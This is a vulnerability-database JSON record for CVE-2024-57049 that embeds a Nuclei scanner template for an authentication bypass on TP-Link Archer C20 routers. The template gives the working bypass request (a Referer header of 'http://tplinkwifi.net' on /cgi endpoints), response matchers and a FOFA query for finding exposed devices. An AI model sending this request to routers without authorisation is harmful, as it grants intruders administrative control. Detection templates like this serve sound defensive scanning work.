{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-57049/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-57049/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-57049/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-57049/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-57049/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-57049"},"sightings":{"href":"/api/v1/sightings/cve-2024-57049"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-57049.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2024-57049\n\ninfo:\n  name: TP-Link Archer C20 - Authentication Bypass\n  author: ritikchaddha\n  severity: critical\n  description: |\n    A vulnerability in the TP-Link Archer C20 router with firmware version V6.6_230412 and earlier permits unauthorized individuals to bypass authentication on interfaces under the /cgi directory. When adding a Referer header with value \"http://tplinkwifi.net\" to requests, the router will recognize the request as passing authentication, allowing access to protected administration interfaces.\n  impact: |\n    Unauthenticated attackers can bypass authentication by adding a specific Referer header, gaining unauthorized access to protected administration interfaces and router configuration.\n  remediation: |\n    Update TP-Link Archer C20 router to firmware version later than V6.6_230412 that addresses the authentication bypass vulnerability.\n  reference:\n    - https://github.com/Shuanunio/CVE_Requests/blob/main/TP-Link/archer%20c20/ACL%20bypass%20Vulnerability%20in%20TP-Link%20archer%20c20.md\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-57049\n    - https://github.com/advisories/GHSA-qr32-fcm4-m5h9\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2024-57049\n    cwe-id: CWE-287\n    epss-score: 0.03211\n    epss-percentile: 0.86579\n  metadata:\n    max-request: 1\n    verified: true\n    fofa-query: body=\"Archer C20\"\n  tags: cve,cve2024,tp-link,auth-bypass,archer-c20,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /cgi/getGDPRParm HTTP/1.1\n        Host: {{Hostname}}\n        Referer: http://tplinkwifi.net\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"$.ret=0;\"\n          - \"var \"\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/javascript\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100e5f555a941ed4c32ff83bd19611b8cc361b4586286622c1677d87d30366b24a202206e6cc7e1b6d84e1e1f3c6005d3d75657fde626aa3ce3ac88c01fb61bc3065a33:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2024-57049"}